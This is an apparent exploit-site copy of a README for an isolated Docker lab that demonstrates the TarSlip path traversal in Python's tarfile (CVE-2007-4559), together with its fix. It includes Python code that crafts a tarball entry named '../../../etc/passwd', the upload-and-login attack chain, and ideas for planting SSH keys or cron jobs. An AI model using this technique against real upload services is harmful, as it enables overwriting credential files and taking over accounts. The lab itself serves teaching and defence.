Exploit for Path Traversal in Python CVE-2007-4559

Name: Exploit for Path Traversal in Python CVE-2007-4559
Rating: 5 (383 reviews)
2026-04-18 | CVSS 9.8
## https://sploitus.com/exploit?id=2C9F6234-51AA-5233-BB11-B19ADC668F01
# CVE-2007-4559 — TarSlip: The 15-Year Directory Traversal

> **Educational use only.** This lab intentionally exploits file system vulnerabilities inside isolated Docker containers. Do not run on any system with sensitive data or in production environments.

A self-contained Docker lab that demonstrates **CVE-2007-4559** — the infamous "TarSlip" vulnerability in Python's `tarfile` module — through a concrete, end-to-end attack chain:

1. An attacker uploads a crafted tarball to a file upload API.
2. `extractall()` blindly writes a tar entry named `../../../etc/passwd` outside the extraction directory, overwriting the real system file.
3. The planted password grants the attacker access to a protected `/admin` endpoint.
4. The same attack is then run against a fixed API — and blocked with one line of code.

---

## The vulnerability

Python's `tarfile.extractall()` faithfully reproduces every entry in a tar archive, including entries whose names contain `../` path traversal sequences. It was **never designed to be a security boundary**.

```
tar entry name : ../../../etc/passwd
extraction dir : /shared/uploads/a1b2c3d4/

resolved path  : /shared/uploads/a1b2c3d4/../../../etc/passwd
               = /etc/passwd   ← system file overwritten
```

| Timeline | |
|---|---|
| **2007** | Bug reported to the Python security team |
| **2007 – 2022** | Marked "not a security issue" — tarfile is "working as intended" |
| **2022** | Trellix researchers scan GitHub and find **350,000+ repos** calling `extractall()` on untrusted input |
| **2022** | Public disclosure. CVE-2007-4559 resurfaces. Industry-wide scramble. |
| **2023** | PEP 706 ships `filter='data'` in Python 3.12 — the fix is a single argument |

---

## What the demo shows

The demo runs in three beats, each requiring a keypress to advance.

### Beat 1 — Baseline

- `GET /admin` → **401**. The admin endpoint exists and is protected. The attacker does not know the password.
- Upload `innocent.tar.gz` → files land inside the sandbox directory. Everything looks normal.

### Beat 2 — The Exploit

```
Attacker crafts tarslip_passwd.tar.gz
  └─ entry: "../../../etc/passwd"
       content: admin:hacked:1001:...   ← planted password
            │
            ▼
  POST /upload  (multipart file upload)
            │
            ▼
  extractall("/shared/uploads/{uuid}/")
  resolves "../../../etc/passwd" → /etc/passwd   ← CVE-2007-4559
            │
            ▼
  GET /admin   Authorization: Basic admin:hacked
            │
            ▼
  HTTP 200 — "Welcome, admin! You have full admin access."
  flag: CVE-2007-4559{tarslip_passwd_overwrite_to_admin_rce}
```

One HTTP POST. No shell. No RCE payload. Just a tar file.

### Beat 3 — The Fix

The same tarball is uploaded to the fixed API, which passes `filter='data'` to `extractall()`. Python raises `tarfile.OutsideDestinationError` — the traversal is blocked, `/etc/passwd` is untouched, and `/admin` stays locked.

```python
# Vulnerable — default before Python 3.14
tar.extractall(extraction_dir)

# Fixed — PEP 706 (Python 3.12+)
tar.extractall(extraction_dir, filter='data')
```

One argument. Fifteen years to ship.

---

## Architecture

Four services on an isolated Docker bridge network (`tarslip-net`). Nothing reaches the internet.

```
┌─────────────────────────────────────────────────────────┐
│                    tarslip-net (bridge)                  │
│                                                          │
│  ┌─────────────────┐      ┌──────────────────────────┐  │
│  │  vulnerable-api │      │       file-server        │  │
│  │  python:3.11.3  │      │       nginx:alpine       │  │
│  │  port 8000      │      │       port 8080 (host)   │  │
│  │                 │      │                          │  │
│  │  POST /upload   │      │  Serves /shared over     │  │
│  │  GET  /admin    │      │  HTTP — browse extracts  │  │
│  │  GET  /health   │      │  visually                │  │
│  └────────┬────────┘      └────────────┬─────────────┘  │
│           │  shared-storage volume     │                 │
│           └────────────────────────────┘                 │
│                                                          │
│  ┌─────────────────┐                                     │
│  │    attacker     │                                     │
│  │  python:3.12    │  (no host port — internal only)     │
│  │                 │                                     │
│  │  craft_malicious.py  — generates tarballs             │
│  │  demo.py             — drives the demo                │
│  └─────────────────┘                                     │
└─────────────────────────────────────────────────────────┘
```

| Service | Image | Role | Host port |
|---|---|---|---|
| `vulnerable-api` | `python:3.11.3-slim` | Flask upload API + `/admin` guarded by `/etc/passwd` auth | 8000 |
| `fixed-api` | `python:3.12-slim` | Same code + `USE_SAFE_EXTRACTION=true` | 8000 |
| `file-server` | `nginx:alpine` | Directory listing of extracted files | 8080 |
| `attacker` | `python:3.12-slim` | Payload generator + demo driver | — |

The vulnerable and fixed APIs use **identical source code**. The only difference is the `USE_SAFE_EXTRACTION=true` environment variable on the fixed container, which flips the single `filter='data'` argument.

---

## Repository layout

```
CVE-2007-4559-lab/
├── run_demo.sh                      ← start here
├── docker-compose.vulnerable.yml
├── docker-compose.fixed.yml
├── vulnerable-api/
│   ├── app.py                       # Flask API: /upload + /admin + /health
│   ├── Dockerfile                   # seeds admin:s3cr3t_Adm1nPass into /etc/passwd
│   └── requirements.txt
├── file-server/
│   ├── Dockerfile
│   └── nginx.conf
└── attacker/
    ├── craft_malicious.py           # generates innocent.tar.gz + tarslip_passwd.tar.gz
    ├── demo.py                      # four-mode CLI driver (craft/baseline/exploit/verify)
    ├── Dockerfile
    └── requirements.txt
```

---

## Prerequisites

- **Docker** 20.10+ with the Compose plugin (`docker compose version`)
- **macOS / Linux** — the shell script uses `bash`
- Ports **8000** and **8080** free on your host

---

## Running the demo

```bash
git clone https://github.com/your-username/CVE-2007-4559-lab.git
cd CVE-2007-4559-lab
bash run_demo.sh
```

The script is fully interactive. It prints a narrative before each step and waits for **Enter** to advance. No prior Docker knowledge is needed to follow along.

### What each pause point covers

| Pause | Narrative shown | Action on Enter |
|---|---|---|
| 1 | CVE timeline, what the three beats are | Build vulnerable stack |
| 2 | Container roles, seeded admin password | Generate payloads |
| 3 | What's inside each tarball | Beat 1 — baseline |
| 4 | Why `/admin` is 401, what normal extraction looks like | Beat 2 — exploit |
| 5 | The exact traversal math, what gets overwritten | Swap to fixed stack |
| 6 | What `filter='data'` does and why it works | Beat 3 — verify |
| 7 | Key takeaways + broader ZipSlip pattern | Teardown |

### Running beats individually

If you want to step through manually:

```bash
# Vulnerable stack
docker compose -f docker-compose.vulnerable.yml up --build -d
docker compose -f docker-compose.vulnerable.yml exec attacker python craft_malicious.py
docker compose -f docker-compose.vulnerable.yml exec attacker python demo.py baseline
docker compose -f docker-compose.vulnerable.yml exec attacker python demo.py exploit

# Fixed stack
docker compose -f docker-compose.vulnerable.yml down
docker compose -f docker-compose.fixed.yml up --build -d
docker compose -f docker-compose.fixed.yml exec attacker python craft_malicious.py
docker compose -f docker-compose.fixed.yml exec attacker python demo.py verify

# Teardown
docker compose -f docker-compose.fixed.yml down
```

### Visual inspection

While the vulnerable stack is running, open [http://localhost:8080/uploads/](http://localhost:8080/uploads/) to browse the extracted session directories in your browser.

---

## How the `/admin` endpoint works

The API seeds a secret admin password into `/etc/passwd` at image build time:

```
admin:s3cr3t_Adm1nPass:1001:1001:Administrator:/home/admin:/bin/bash
```

`GET /admin` reads this file and checks the second field (password) against the HTTP Basic Auth credentials. The attacker doesn't know `s3cr3t_Adm1nPass` — but after TarSlip overwrites the file with their own version containing `admin:hacked`, they do.

This is a simplified model of real-world targets: SSH `authorized_keys`, application config files, cron jobs, and any credential file the web process can write.

---

## How the payloads are crafted

`craft_malicious.py` uses Python's own `tarfile` module — the same one that has the bug:

```python
def _add_entry(tar, name, content):
    info = tarfile.TarInfo(name=name)   # name is the traversal path
    info.size = len(content)
    tar.addfile(info, io.BytesIO(content))

# Entry name resolves to /etc/passwd when extracted into /shared/uploads/{uuid}/
_add_entry(tar, "../../../etc/passwd", malicious_passwd_content)
```

No special tools. No binary exploitation. The standard library is both the weapon and the victim.

---

## The fix explained

Python 3.12 introduced `filter=` in PEP 706. The `'data'` filter:

- Rejects entries that resolve outside the destination directory
- Strips setuid/setgid bits
- Ignores device files and hard links to unsafe paths
- Raises `tarfile.OutsideDestinationError` on traversal attempts

```python
# Before (vulnerable — still the default until Python 3.14)
with tarfile.open(path) as tar:
    tar.extractall(dest)

# After (safe)
with tarfile.open(path) as tar:
    tar.extractall(dest, filter='data')
```

For Python 3.11 and earlier, validate manually:

```python
import os

def safe_extract(tar, dest):
    dest = os.path.realpath(dest)
    for member in tar.getmembers():
        member_path = os.path.realpath(os.path.join(dest, member.name))
        if not member_path.startswith(dest + os.sep):
            raise ValueError(f"Unsafe path: {member.name}")
    tar.extractall(dest)
```

Static analysis: `bandit` rule **B202** flags unsafe `extractall()` calls in CI.

---

## Broader impact — ZipSlip

TarSlip is Python's name for a class of vulnerability that exists in every language with archive extraction APIs:

| Language | Vulnerable API | CVE / Advisory |
|---|---|---|
| Python | `tarfile.extractall()` | CVE-2007-4559 |
| Java | `ZipInputStream` | ZipSlip (2018) |
| Go | `archive/zip` | ZipSlip (2018) |
| .NET | `ZipArchive` | ZipSlip (2018) |
| Node.js | `tar`, `adm-zip`, others | ZipSlip (2018) |

Same root cause everywhere: trusting paths from untrusted archives. Same fix everywhere: canonicalize and validate before writing.

---

## Audience variations

### Developer audiences
Focus on the before/after code diff and the `bandit` B202 rule. The goal is "how do we prevent this in our codebase?" — show the PEP 706 migration guide and how to add the check to CI.

### Security audiences
Focus on the Trellix disclosure methodology — how they searched GitHub at scale, estimated impact across 350,000 repos, and navigated responsible disclosure for a vulnerability this widespread.

### CTF audiences
Extend `craft_malicious.py` to plant an SSH `authorized_keys` file or a malicious cron entry instead of `/etc/passwd`. Same technique, different targets — shows that any writable path is an attack surface.

---

## References

- [NVD — CVE-2007-4559](https://nvd.nist.gov/vuln/detail/CVE-2007-4559)
- [PEP 706 — Filter for tarfile.extractall](https://peps.python.org/pep-0706/)
- [Trellix — "15 Years Later: On the Dangers of Zip/Tar Slip"](https://www.trellix.com/en-us/about/newsroom/stories/research/tarslip.html)
- [Python issue tracker — bpo-21109](https://bugs.python.org/issue21109) (the original 2007 report)
- [Bandit B202](https://bandit.readthedocs.io/en/latest/plugins/b202_tarfile_unsafe_members.html)
- [Snyk ZipSlip advisory](https://security.snyk.io/research/zip-slip-vulnerability)

---

## License

MIT — use freely for education, security research, and conference demos. Do not use the payload generation techniques against systems you do not own.